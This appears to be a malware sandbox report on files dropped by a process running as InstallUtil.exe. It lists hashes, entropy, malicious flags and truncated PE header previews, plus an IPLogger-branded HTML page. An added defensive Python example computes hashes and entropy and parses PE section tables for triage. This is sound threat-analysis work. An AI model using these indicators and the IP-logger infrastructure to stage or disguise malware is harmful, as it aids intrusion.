                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):175104
Entropy (8bit):6.135102131058025
Encrypted:false
SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
MD5:89B400AF781E7D55812A77260DC1D9C8
SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1956920
Entropy (8bit):7.99369020397791
Encrypted:true
SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
MD5:17B5157E8F35F33EB2325EE5751BCF3B
SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
Malicious:true
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768479767034927
Encrypted:false
SSDEEP:49152:2nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHI:lWqlkLESgCRE/vhOjb05efd6e/oXHI
MD5:442BA51AC0AF3E8D9F489F643AFA6268
SHA1:681867F9C25D27319DA3C197E5506CDA0FDDA36A
SHA-256:7974CDC50115E1D48544C30E120A7AF883B0B71281A17245100B197E282D4D51
SHA-512:F5C3350AF33AA92160989A0CF48605C49CEDDBBCD70849A4BD5974786A9BD912FF5102D6B984C434A8FF93C682625222D84988A7F711D81C8E2A3EA28D9028BC
Malicious:true
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4283784
                                                                                                                          Entropy (8bit):7.981853182461957
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                          MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                          SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                          SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                          SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1956920
                                                                                                                          Entropy (8bit):7.99369020397791
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
                                                                                                                          MD5:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
                                                                                                                          SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
                                                                                                                          SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4283784
                                                                                                                          Entropy (8bit):7.981853182461957
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                          MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                          SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                          SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                          SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
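The records above give, for every dropped file, its hashes, size, 8-bit entropy, an "Encrypted" flag and a header preview. The previews already tell a triager a lot: a "This program cannot be run in DOS mode" stub with a `Rich` header, a Nullsoft stub carrying an `.ndata` section (the entry typed "Nullsoft Installer self-extracting archive"), a Borland/Delphi stub that starts `MZP` and says "This program must be run under Win32", and entropy of 7.98 to 7.99 bits per byte on the large PE payloads, which is what compressed or encrypted content looks like. The Python below is an added example, not code from Joe Sandbox or from this report: it recomputes those record fields for a byte blob and parses the PE section table so a sample pulled from disk can be checked against the table offline. The PE images it builds are constructed test input; the `.ndata`/`MZP` heuristics and the 7.9 entropy threshold are the example's own assumptions, not the sandbox's rule for its "Encrypted" flag, which the page does not state.

```python
"""Recompute the fields of a sandbox dropped-file record for a byte blob.

Added example (not Joe Sandbox code).  Assumptions, flagged in comments:
the '.ndata' and 'MZP' heuristics and the 7.9 entropy threshold are this
example's own; the sandbox's 'Encrypted' rule is not documented on the page.
"""
import hashlib
import math
import struct
from collections import Counter
from typing import Optional


def hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA-256/SHA-512 as upper-case hex, matching the report's layout."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def entropy8(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0..8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(data: bytes) -> Optional[list]:
    """Section names from a PE image; None if the MZ/PE headers are not there."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40                  # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break                             # truncated image: keep what parsed so far
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def classify(data: bytes, packed_threshold: float = 7.9) -> dict:
    """One dropped-file record plus three triage heuristics for a blob."""
    sections = pe_sections(data)
    ent = entropy8(data)
    return {
        **hashes(data),
        "size": len(data),
        "entropy": round(ent, 6),
        "is_pe": sections is not None,
        "sections": sections or [],
        # Heuristics (assumptions): NSIS stubs carry a '.ndata' section; Borland/Delphi
        # linkers emit an 'MZP' DOS stub ('This program must be run under Win32');
        # entropy near 8 bits/byte means compressed or encrypted content.
        "nsis_stub": bool(sections) and ".ndata" in sections,
        "borland_stub": data[:3] == b"MZP",
        "likely_packed": ent > packed_threshold,
    }


def build_pe(section_names, dos_stub: bytes = b"MZ", payload: bytes = b"") -> bytes:
    """Constructed, non-loadable PE32 skeleton used only as sample input."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:len(dos_stub)] = dos_stub
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xE0                                            # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    secs = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs + payload


# Constructed samples mirroring the stub shapes seen in the report's previews.
SAMPLES = {
    "nsis_like": build_pe([".text", ".data", ".rdata", ".bss", ".idata", ".ndata", ".rsrc"]),
    "delphi_like": build_pe(["CODE", "DATA", "BSS", ".idata", ".tls", ".rdata", ".reloc", ".rsrc"],
                            dos_stub=b"MZP"),
    "packed_like": build_pe([".text", ".rdata", ".data", ".rsrc"], payload=bytes(range(256)) * 256),
    "html": b"<!DOCTYPE html>\n<html lang=\"\" class=\"html\">\n",
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        r = classify(blob)
        print(f"{label:12} size={r['size']:6} entropy={r['entropy']:.3f} "
              f"pe={r['is_pe']} nsis={r['nsis_stub']} borland={r['borland_stub']} "
              f"packed={r['likely_packed']} sha256={r['sha256'][:16]}...")
```

To compare a file on disk with a record above, pass `open(path, "rb").read()` to `classify()` and check the SHA-256 and entropy fields against the table; a matching hash with a different section list or stub type means the on-disk copy is not the artefact the sandbox saw.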
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4965376
Entropy (8bit):7.998473914211242
Encrypted:true
SSDEEP:98304:ekAPDoNnW1oBnzMVYUCBfeMG0OTtp7fEj8LrtXHMjDTfLDL0YD:ekGAdnQUBfSTvf+gZmDTND
MD5:C48550046950C54CE85493EA4FBD8C3D
SHA1:4DFC38A221404C8345CC0875B01169B076DB5BF3
SHA-256:B0F58BF601DEC22D5DFF4818A7FBC1A73F54112673A2F554A2B7E7E3D684D6FB
SHA-512:4FFCA80B8C54A0C18DFF2E879A178165DD9206ACA7D19742F525A01BFE879EE589AFED8F2809B322EAC2150042F97A16310B1C7FEE723169BEDE6D4F5706167E
Malicious:true
Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@..........................................................................b...........................)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):942080
Entropy (8bit):7.969490892344475
Encrypted:false
SSDEEP:24576:xACKxHk1sJgDqrFXexjOEQUaV62+xVSE0wWqlS2iE:ep2ASqpeZOvDo9xVDzWIV
MD5:2CAC326C29AA211F0234532B6E65FA4A
SHA1:8B923851D848FA171C4BFF5BB13E23829AA6D620
SHA-256:54677FC8C00EDF7946E823E57043244E605D7ACFC3DCE280D5833E174139E054
SHA-512:5F74853523E3FCF6E86B9B224B138F8A6BC14A8E43473E0707F77855A547DF1C5E29128D1C0D251C8746AB718AE4AC1008A7F1224E18E7F63BF00217F564C538
Malicious:true
Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@..........................................................................b...........................)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

Process:C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:V:V
MD5:CFCD208495D565EF66E7DFF9F98764DA
SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:false
Preview:0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146090
Entropy (8bit):7.982011327302058
Encrypted:false
SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
MD5:0D69DD3893505245669619A06840C2FE
SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
